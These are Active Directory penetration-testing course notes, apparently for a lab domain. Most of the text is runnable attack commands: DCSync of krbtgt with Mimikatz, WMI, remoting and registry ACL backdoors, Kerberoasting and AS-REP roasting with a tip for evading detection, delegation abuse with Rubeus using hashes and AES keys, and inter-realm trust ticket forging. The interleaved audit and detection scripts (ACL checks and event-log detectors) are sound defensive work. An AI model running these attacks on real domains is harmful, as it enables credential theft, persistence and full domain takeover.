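The one-liners above answer one question at a time. As an added example, not code from the course notes, PowerView or RACE, the functions below gather in one pass what the AdminSDHolder backdoor and the later DCSync check (Learning Objective 12, "does studentx have replication rights?") both need: every Allow ACE on the AdminSDHolder object, the Domain Admins group and the domain head that applies to a principal, either directly or through any group it belongs to, with the well-known extended-right GUIDs resolved. It assumes the ActiveDirectory module; the GUIDs in the table are the fixed AD rights GUIDs, and `tokenGroups` is used for transitive membership with a direct-membership fallback.

```powershell
# Added example: what can a principal do on AdminSDHolder, Domain Admins and the domain head,
# and does that amount to DCSync? Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

# Well-known AD extended-right / attribute GUIDs (fixed values in the schema)
$script:RightGuid = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'Member (WriteMembers)'
}

function Get-PrincipalDomainRights {
    param([Parameter(Mandatory)][string]$SamAccountName)
    $domain = Get-ADDomain
    # SIDs the principal carries: its own plus every group it is in (tokenGroups is transitive)
    $acct = Get-ADUser -Identity $SamAccountName -Properties tokenGroups
    $groupSids = @($acct.tokenGroups | ForEach-Object { $_.Value })
    if (-not $groupSids) { $groupSids = @((Get-ADPrincipalGroupMembership $SamAccountName).SID.Value) }  # direct only
    $sids = @($acct.SID.Value) + $groupSids
    $targets = @{
        AdminSDHolder   = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
        'Domain Admins' = "CN=Domain Admins,CN=Users,$($domain.DistinguishedName)"
        DomainHead      = $domain.DistinguishedName
    }
    foreach ($t in $targets.GetEnumerator()) {
        foreach ($ace in (Get-Acl "AD:\$($t.Value)").Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try   { $aceSid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { $aceSid = $ace.IdentityReference.Value }
            if ($sids -notcontains $aceSid) { continue }
            $g = $ace.ObjectType.Guid
            $objType = if ($g -eq [guid]::Empty.Guid) { 'All' } elseif ($RightGuid.ContainsKey($g)) { $RightGuid[$g] } else { $g }
            [pscustomobject]@{
                Target     = $t.Key
                Identity   = $ace.IdentityReference.Value
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = $objType
                Inherited  = $ace.IsInherited
            }
        }
    }
}

function Test-DCSyncRight {
    # DCSync needs Get-Changes AND Get-Changes-All on the domain head, or a right covering all extended rights
    param([Parameter(Mandatory)][string]$SamAccountName)
    $head = @(Get-PrincipalDomainRights -SamAccountName $SamAccountName | Where-Object Target -eq 'DomainHead')
    $all  = @($head | Where-Object { $_.ObjectType -eq 'All' -and ($_.Rights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) })
    $have = @($head | ForEach-Object { $_.ObjectType })
    $getChanges    = ($all.Count -gt 0) -or ($have -contains 'DS-Replication-Get-Changes')
    $getChangesAll = ($all.Count -gt 0) -or ($have -contains 'DS-Replication-Get-Changes-All')
    [pscustomobject]@{
        Principal     = $SamAccountName
        GetChanges    = $getChanges
        GetChangesAll = $getChangesAll
        CanDCSync     = ($getChanges -and $getChangesAll)
    }
}

Get-PrincipalDomainRights -SamAccountName student1 | Format-Table -AutoSize
Test-DCSyncRight -SamAccountName student1
```

Rows on the `Domain Admins` target that are not inherited and match rows on `AdminSDHolder` show that SDProp has already pushed the backdoor ACE down; `CanDCSync` going from false to true is the check for Learning Objective 12 before and after the `-Rights DCSync` command.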
- Add rights for DCSync (the replication extended rights on the domain object):

```powershell
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
```

- Using the ActiveDirectory Module and RACE:

```powershell
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose
```

Execute DCSync:

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

or

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

# **Learning Objective 12**

- Check if studentx has Replication (DCSync) rights.
- If yes, execute the DCSync attack to pull the hashes of the krbtgt user.
- If no, add the replication rights for studentx and execute the DCSync attack to pull the hashes of the krbtgt user.

## **Solution**

**_Coming Soon_**

# **Using ACLs - Security Descriptors - WMI**

- ACLs can be modified to allow non-admin users access to securable objects. Using the RACE toolkit:

```powershell
# First of all, dot-source the RACE toolkit to import it:
. C:\AD\Tools\RACE-master\RACE.ps1

# On the local machine for student1:
Set-RemoteWMI -SamAccountName student1 -Verbose

# On a remote machine for student1 without explicit credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On a remote machine with explicit credentials. Only root\cimv2 and nested namespaces are modified:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# On a remote machine, remove the permissions again:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
```

**Example**

- After running the second command above, we can use `gwmi` as student1 to query information on the DC

![](https://i.imgur.com/WNWRJR1.png)

# **Using ACLs - Security Descriptors - PowerShell Remoting**

- Using the RACE toolkit - the PS Remoting backdoor is not stable after the August 2020 patches -:

```powershell
# First of all, dot-source the RACE toolkit to import it:
. C:\AD\Tools\RACE-master\RACE.ps1

# On the local machine for student1:
Set-RemotePSRemoting -SamAccountName student1 -Verbose

# On a remote machine for student1 without credentials:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose

# On a remote machine, remove the permissions:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
```

- We can then run `Enter-PSSession dcorp-dc` as student1 to get an interactive shell on the DC. The session runs with student1's own rights only (a regular domain user), not with administrative privileges.
- What we can do from there is enumerate for credentials: stored `.txt` files, scripts, or even an `NTDS.dit` backup, which are often found directly under `C:\`.

# **Using ACLs - Security Descriptors - Remote Registry**

- Using `RACE` or DAMP, with admin privs on the remote machine, plant the backdoor (make sure to run this first) -:

```powershell
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
```

- As student1, retrieve the machine account hash:

```powershell
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
```

- Retrieve the local account hashes:

```powershell
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
```

- Retrieve domain cached credentials:

```powershell
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
```

> We can then **optionally** craft a silver ticket with the machine account hash for the `RPCSS` (together with `HOST`) service to get code execution on the domain controller over WMI.

# **Learning Objective 13**

- Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access.
- Retrieve the machine account hash from dcorp-dc without using administrator access and use it to execute a Silver Ticket attack to get code execution with WMI.
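The WMI half of Learning Objective 13 is easy to verify, and easy for a defender to spot, by reading the namespace security descriptor that `Set-RemoteWMI` edits. As an added example, not code from the course notes or the RACE toolkit, the function below fetches the DACL of a WMI namespace through `__SystemSecurity.GetSecurityDescriptor`, decodes the WBEM access-mask bits, and flags any trustee other than BUILTIN\Administrators or SYSTEM that holds `Remote Enable`, which is the right a non-admin needs for remote `gwmi` queries. It assumes admin rights on the target (the same prerequisite the backdoor itself has); the access-mask constants are the documented WBEM values.

```powershell
# Added example: audit a WMI namespace DACL for non-admin trustees with Remote Enable.
# Assumes admin rights on the target; run before and after Set-RemoteWMI to see the change.
function Get-WmiNamespaceAcl {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [string]$Namespace    = 'root\cimv2'
    )
    # WBEM access-mask bits (wbemcli.h)
    $flag = [ordered]@{
        Enable = 0x1; MethodExecute = 0x2; FullWrite = 0x4; PartialWrite = 0x8
        ProviderWrite = 0x10; RemoteEnable = 0x20; ReadControl = 0x20000; WriteDAC = 0x40000
    }
    $sd = (Invoke-WmiMethod -Namespace $Namespace -Path '__SystemSecurity=@' -Name GetSecurityDescriptor -ComputerName $ComputerName).Descriptor
    foreach ($ace in $sd.DACL) {
        $who     = if ($ace.Trustee.Domain) { "$($ace.Trustee.Domain)\$($ace.Trustee.Name)" } else { $ace.Trustee.Name }
        $rights  = @($flag.Keys | Where-Object { $ace.AccessMask -band $flag[$_] })
        $isAdmin = $ace.Trustee.SIDString -in 'S-1-5-32-544', 'S-1-5-18'   # BUILTIN\Administrators, SYSTEM
        $allow   = ($ace.AceType -eq 0)                                     # 0 = access allowed, 1 = denied
        [pscustomobject]@{
            Namespace  = $Namespace
            Trustee    = $who
            SID        = $ace.Trustee.SIDString
            Type       = if ($allow) { 'Allow' } else { 'Deny' }
            Rights     = ($rights -join ',')
            # Authenticated Users normally have Enable/MethodExecute/ProviderWrite but NOT RemoteEnable
            Suspicious = ($allow -and -not $isAdmin -and ($rights -contains 'RemoteEnable'))
        }
    }
}

# Usage: the student1 entry added by Set-RemoteWMI shows up with RemoteEnable and Suspicious = True
Get-WmiNamespaceAcl -ComputerName dcorp-dc | Format-Table -AutoSize
```

`Set-RemoteWMI` also has to grant the user remote DCOM launch and activation permissions (`HKLM\SOFTWARE\Microsoft\Ole` `MachineLaunchRestriction` / `MachineAccessRestriction`), so a complete audit checks those two security descriptors as well; this function covers the namespace DACL only.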
## **Solution**

**_Coming Soon_**

--------------------------------------------------------------------------------
/Domain Privilege Escalation.md:
--------------------------------------------------------------------------------

**Let's think of scenarios where there are no vulnerable services or paths: how else can we escalate privileges in an Active Directory environment, and what other opportunities are there?**

# **Kerberoast (More Effective)**

![](https://i.imgur.com/ruStWfi.png)

- Offline cracking of service account passwords.
- The Kerberos service ticket (TGS) has a server portion which is encrypted with the password hash of the service account. This makes it possible to request a ticket and run an offline password attack against it.
- Because (non-machine) service account passwords are not changed frequently, this has become a very popular attack!

**_Example -:_**

- Find user accounts used as service accounts

```powershell
# AD Module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

# PowerView
Get-DomainUser -SPN
```

> **Hint :** When you run `klist`, the SPN can be identified as the name of the form {service/machine name}

![](https://i.imgur.com/S7sx0zM.png)

**_Capturing Hashes :_**

- Use Rubeus to list Kerberoast stats

```powershell
Rubeus.exe kerberoast /stats
```

- Use Rubeus to request a TGS (this is a must run)

```powershell
Rubeus.exe kerberoast /user:svcadmin /simple
```

- To avoid detections based on Encryption Downgrade for Kerberos EType (used by the likes of MDI; 0x17 stands for rc4-hmac), look for Kerberoastable accounts that only support RC4_HMAC (also a must run)

```powershell
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
```

- Kerberoast all possible accounts

```powershell
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
```

> **Note -:** You don't need Invisi-Shell while running `rubeus` here, it won't be stable. Also, the two options marked **must run** must both be run, as one might provide a hash and the other might not, depending on the system configuration

**_Cracking Hashes :_**

- Crack the ticket using John the Ripper

```powershell
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
```

# **Learning Objective 14**

- Using the Kerberoast attack, crack the password of a SQL server service account.

## **Solution**

**_Coming Soon_**

# **Targeted Kerberoasting - AS-REPs**

- If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.
- With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forcibly disabled as well.
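Detection logic for the two attacks just described, Kerberoasting (event 4769 with an RC4 service ticket for a user-account SPN, the etype 0x17 downgrade mentioned above) and AS-REP roasting (event 4768 issued without pre-authentication). This is an added example, not code from the course notes; the event records are constructed by hand and only mirror the field names of the real Security log events, and the requester IPs are made up.

```python
"""Kerberoast / AS-REP roast detection over constructed 4769 and 4768 records."""

# Encryption type 0x17 is RC4-HMAC, the downgrade MDI alerts on (see /rc4opsec).
RC4_HMAC = 0x17
# Pre-Authentication Type 0 in event 4768 means the AS-REQ carried no pre-auth,
# which is exactly what an AS-REP roastable account produces.
NO_PREAUTH = 0

# Constructed sample events (field names follow the Security log XML).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "svcadmin", "TicketEncryptionType": 0x17,
     "IpAddress": "172.16.100.1", "Status": 0x0},
    {"EventID": 4769, "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-MGMT$", "TicketEncryptionType": 0x12,
     "IpAddress": "172.16.100.1", "Status": 0x0},
    {"EventID": 4769, "TargetUserName": "student1@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": 0x17,
     "IpAddress": "172.16.100.1", "Status": 0x0},
    {"EventID": 4768, "TargetUserName": "VPN1user", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "172.16.100.1", "Status": 0x0},
    {"EventID": 4768, "TargetUserName": "control1user", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "172.16.100.15", "Status": 0x0},
]


def is_kerberoast_candidate(ev):
    """RC4 service ticket for a user-account SPN (machine accounts and krbtgt excluded)."""
    if ev.get("EventID") != 4769 or ev.get("Status", 0) != 0:
        return False
    svc = ev.get("ServiceName", "")
    # Tickets for machine accounts (name ends in $) and krbtgt are routine;
    # an RC4 ticket for a user-account SPN is the Kerberoast signature.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def is_asrep_roast_candidate(ev):
    """Successful 4768 with no pre-authentication: the AS-REP is crackable offline."""
    return (ev.get("EventID") == 4768 and ev.get("Status", 0) == 0
            and ev.get("PreAuthType") == NO_PREAUTH)


def find_roasting(events, rc4_threshold=1):
    """Return {'kerberoast': {(requester, ip): [service, ...]}, 'asrep': [user, ...]}.

    rc4_threshold is the number of distinct RC4 SPN requests from one
    requester/IP pair needed before it is reported (1 reports every request).
    """
    by_requester = {}
    asrep = []
    for ev in events:
        if is_kerberoast_candidate(ev):
            key = (ev["TargetUserName"], ev.get("IpAddress", "?"))
            by_requester.setdefault(key, []).append(ev["ServiceName"])
        elif is_asrep_roast_candidate(ev):
            asrep.append(ev["TargetUserName"])
    kerberoast = {k: v for k, v in by_requester.items() if len(set(v)) >= rc4_threshold}
    return {"kerberoast": kerberoast, "asrep": asrep}


if __name__ == "__main__":
    for kind, hits in find_roasting(SAMPLE_EVENTS).items():
        print(kind, hits)
```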
![](https://i.imgur.com/MITSHLg.png)

**_Example -:_**

- Enumerate accounts with Kerberos preauth disabled

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

- Force-disable Kerberos preauth
- Let's enumerate the permissions for RDPUsers on ACLs using `PowerView`, then toggle the `DONT_REQ_PREAUTH` bit (4194304) of the target user's `userAccountControl` and verify:

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Verbose
```

- Request the encrypted AS-REP for offline brute-force.
- Let's use `ASREPRoast`

```powershell
Get-ASREPHash -UserName VPN1user -Verbose
```

- To enumerate all users with Kerberos preauth disabled and request a hash for each

```powershell
Invoke-ASREPRoast -Verbose
```

- We can use John the Ripper to brute-force the hashes offline

```powershell
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
```

# **Targeted Kerberoasting - Set SPN**

- With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (it must be unique in the domain).
- We can then request a TGS without special privileges. The TGS can then be "Kerberoasted".

**_Example :_**

- Let's enumerate the permissions for **RDPUsers** on ACLs using `PowerView`:

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```

- See if the user already has an SPN:

```powershell
# PowerView
Get-DomainUser -Identity supportuser | select serviceprincipalname

# AD module
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
```

- Set an SPN for the user (must be unique in the forest)

```powershell
# PowerView
Set-DomainObject -Identity support1user -Set @{serviceprincipalname='dcorp/whatever1'}

# AD module
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='dcorp/whatever1'}
```

- Kerberoast the user and crack the hash

```powershell
Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
```

# **Kerberos Delegation**

- A user provides credentials to the Domain Controller.
- The DC returns a TGT.
- The user requests a TGS for the web service on the web server.
- The DC provides a TGS.
- The user sends the TGT and TGS to the web server.
- The web server service account uses the user's TGT to request a TGS for the database server from the DC.
- The web server service account connects to the database server as the user.
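An audit of the directory changes the two targeted-Kerberoasting sections above rely on, the `-XOR 4194304` flip of `DONT_REQ_PREAUTH` and an SPN written onto a user, using the Old/New UAC values that Security event 4738 records and the attribute fields of event 5136; it also decodes the delegation bits (`TRUSTED_FOR_DELEGATION`, `TRUSTED_TO_AUTH_FOR_DELEGATION`) that the delegation sections enumerate. This is an added example, not code from the course notes; the event records are constructed, and the flag values are the documented `userAccountControl` bits.

```python
"""Audit userAccountControl and SPN changes from constructed 4738 / 5136 records."""

# userAccountControl bits (documented AD schema values).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",                 # 4194304, AS-REP roastable
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # T2A4D, protocol transition
}
# Bits whose appearance on an account deserves a ticket to the SOC.
RISKY_SET = {"TRUSTED_FOR_DELEGATION", "DONT_REQ_PREAUTH",
             "TRUSTED_TO_AUTH_FOR_DELEGATION"}


def decode_uac(value):
    """Return the set of flag names set in a userAccountControl integer."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def diff_uac(old, new):
    """Return (added, removed) flag names between two UAC values."""
    before, after = decode_uac(old), decode_uac(new)
    return after - before, before - after


def audit_directory_changes(events):
    """Walk 4738 (user changed) and 5136 (attribute changed) records; return findings."""
    findings = []
    for ev in events:
        if ev["EventID"] == 4738:
            added, _removed = diff_uac(ev["OldUacValue"], ev["NewUacValue"])
            for flag in sorted(added & RISKY_SET):
                findings.append(f"{ev['SubjectUserName']} set {flag} on {ev['TargetUserName']}")
        elif (ev["EventID"] == 5136
              and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
              and ev["ObjectClass"] == "user"
              and ev["OperationType"] == "Value Added"):
            # An SPN added to a user object makes that user Kerberoastable.
            findings.append(f"{ev['SubjectUserName']} added SPN {ev['AttributeValue']} "
                            f"to {ev['ObjectDN']}")
    return findings


# Constructed samples: the -XOR call above (0x200 -> 0x200 ^ 0x400000), a
# harmless 4738 where nothing risky changed, and the Set-DomainObject SPN write.
SAMPLE_EVENTS = [
    {"EventID": 4738, "SubjectUserName": "student1", "TargetUserName": "Control1User",
     "OldUacValue": 0x200, "NewUacValue": 0x200 ^ 4194304},
    {"EventID": 4738, "SubjectUserName": "Administrator", "TargetUserName": "svcadmin",
     "OldUacValue": 0x200, "NewUacValue": 0x200},
    {"EventID": 5136, "SubjectUserName": "student1", "ObjectClass": "user",
     "ObjectDN": "CN=support1user,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "dcorp/whatever1", "OperationType": "Value Added"},
]

if __name__ == "__main__":
    for line in audit_directory_changes(SAMPLE_EVENTS):
        print(line)
```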
**_Examples -:_**

- Discover domain computers (and users) which have unconstrained delegation enabled:

```powershell
# PowerView
Get-DomainComputer -UnConstrained

# AD Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
```

- Compromise the server(s) where unconstrained delegation is enabled.
- We must trick or wait for a domain admin to connect to a service on appsrv.
- Now, if the export command is run again, the DA's TGT is among the exported tickets:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```

- The DA ticket can then be reused:

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

# **Unconstrained Delegation - Printer Bug**

- We can capture the TGT of dcorp-dc$ by using `Rubeus` on **dcorp-appsrv**:

```powershell
Rubeus.exe monitor /interval:5 /nowrap
```

- After that, run `MS-RPRN.exe` (https://github.com/leechristensen/SpoolSample) on the student VM:

```powershell
MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
```

***

- If you are attacking from a Linux machine, check out Coercer (https://github.com/p0dalirius/Coercer) for other MS protocols that can be abused for coercion.

***

- Copy the base64 encoded TGT, remove extra spaces (if any) and use it on the student VM:

```powershell
Rubeus.exe ptt /ticket:
```

- Once the ticket is injected, run `DCSync`:

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

# **Learning Objective 15**

- Find a server in the dcorp domain where Unconstrained Delegation is enabled.
- Compromise the server and escalate to Domain Admin privileges.
- Escalate to Enterprise Admin privileges by abusing the Printer Bug!

## **Solution**

**_Coming Soon_**

# **Constrained Delegation**

- To abuse constrained delegation, we need to have access to the `websvc` account. If we have access to that account, it is possible to access the services listed in **msDS-AllowedToDelegateTo** of the `websvc` account as ANY user. The service account must also have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D) `UserAccountControl` flag set

![](https://i.imgur.com/ezTsNOd.png)

**_Example_**

- Enumerate users and computers with constrained delegation enabled

```powershell
# PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

![](https://i.imgur.com/c767LzL.png)

## **Abusing with Kekeo**

- Either the plaintext password or the NTLM hash/AES keys are required. We already have access to websvc's hash from dcorp-adminsrv.
- Using asktgt from Kekeo, we request a TGT (steps 2 & 3 in the diagram):

```powershell
kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
```

- Using s4u from Kekeo, we request a TGS (steps 4 & 5):

```powershell
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
```

- Using mimikatz, inject the ticket (step 6):

```powershell
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

- You can now run commands on the remote system (the one listed in **msDS-AllowedToDelegateTo**)

```powershell
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

## **Abusing with Rubeus**

- We can use the following command (we are requesting a TGT and TGS in a single command):

```powershell
Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt
```

- You can now run commands on the remote system (the one listed in **msDS-AllowedToDelegateTo**)

```powershell
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

## **Constrained Delegation - Service Abuse**

- Another interesting issue in Kerberos is that the delegation occurs not only for the specified service but for any service running under the same account.
There is no validation of the SPN specified.
- This is huge, as it allows access to many interesting services even when the delegation is configured for a non-intrusive service!

- Enumerate users and computers with constrained delegation enabled

```powershell
# PowerView
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
```

![](https://i.imgur.com/3ymZaqa.png)

- Abusing with `Rubeus`
- We can use the following command (we are requesting a TGT and TGS in a single command; `/altservice` substitutes the service class of the SPN in msDS-AllowedToDelegateTo):

```powershell
Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b445 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```

- After injection, we can run `DCSync`:

```powershell
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```

# **Learning Objective 16**

- [ ] Enumerate users in the domain for whom Constrained Delegation is enabled.
    - For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
    - Pass the ticket and access the service as DA.
- [ ] Enumerate computer accounts in the domain for which Constrained Delegation is enabled.
    - For such an account, request a TGT from the DC.
    - Use the TGS for executing the DCSync attack.

## **Solution**

**_Coming Soon_**

# **Resource-based Constrained Delegation**

- To abuse RBCD in its most effective form, we just need two privileges:

1. Write permissions over the target service or object to configure msDS-AllowedToActOnBehalfOfOtherIdentity.
2. Control over an object which has an SPN configured (like admin access to a domain-joined machine, or the ability to join a machine to the domain: ms-DS-MachineAccountQuota is 10 for all domain users).
3. We already have admin privileges on the student VMs, which are domain-joined machines.
4. Enumeration shows that the user **'ciadmin'** has Write permissions over the dcorp-mgmt machine!

```powershell
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'}
```

- Using the ActiveDirectory module, configure RBCD on `dcorp-mgmt` for the student machines:

```powershell
$comps = 'dcorp-student1$','dcorp-student2$'
Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps
```

- Now, let's get the privileges of `dcorp-studentx$` by extracting its AES keys:

```powershell
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
```

![](https://i.imgur.com/d6NEWHh.png)

> **Note -:** With the above command we want to extract the AES key for 'dcorp-student1$', which we will use with `rubeus` to access `dcorp-mgmt`. You might find multiple entries for this account, so take note of the SID `S-1-5-18`: this is the SID of the SYSTEM account, and that is the entry we want

- Use the AES key of `dcorp-studentx$` with `Rubeus` to access dcorp-mgmt as ANY user we want:

```powershell
Rubeus.exe s4u /user:dcorp-student1$ /aes256:d1027fbaf7faad598aaeff08989387592c0d8e0201ba453d83b9e6b7fc7897c2 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
```

- We can then use `winrs` to access the remote system, in this case `dcorp-mgmt`

```powershell
winrs -r:dcorp-mgmt cmd
```

# **Learning Objective 17**

- Find a computer object in the dcorp domain where we have Write permissions.
- Abuse the Write permissions to access that computer as Domain Admin.

## **Solution**

**_Coming Soon_**

# **Across Trusts**

- Across Domains - implicit two-way trust relationship.
- Across Forests - a trust relationship needs to be established.

![](https://i.imgur.com/HzxGZe6.png)

# **Child to Parent**

- sIDHistory is a user attribute designed for scenarios where a user is moved from one domain to another. When a user's domain is changed, they get a new SID and the old SID is added to sIDHistory.
- sIDHistory can be abused in two ways to escalate privileges within a forest:
    - krbtgt hash of the child
    - Trust tickets

## **Child to Parent using Trust Tickets**

1. What is required to forge trust tickets is, obviously, the trust key. Look for the [In] trust key from child to parent.

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
```

OR

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
```

OR

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

![](https://i.imgur.com/tglgutQ.png)

2. We can then forge an inter-realm TGT:

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
```

|Option|Description|
|---|---|
|kerberos::golden|The mimikatz module|
|/domain|FQDN of the current domain|
|/sid|SID of the current domain|
|/sids|SID of the Enterprise Admins group of the parent domain|
|/rc4|RC4 of the trust key|
|/user|User to impersonate|
|/service|Target service in the parent domain|
|/target|FQDN of the parent domain|
|/ticket|Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi)|

3. Note that we are still using the TGT forged initially

```powershell
Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
```

4. Run a command on the remote system

```powershell
ls \\mcorp-dc.moneycorp.local\c$
```

> This is how to escalate from a child domain to the forest root

# **Learning Objective 18**

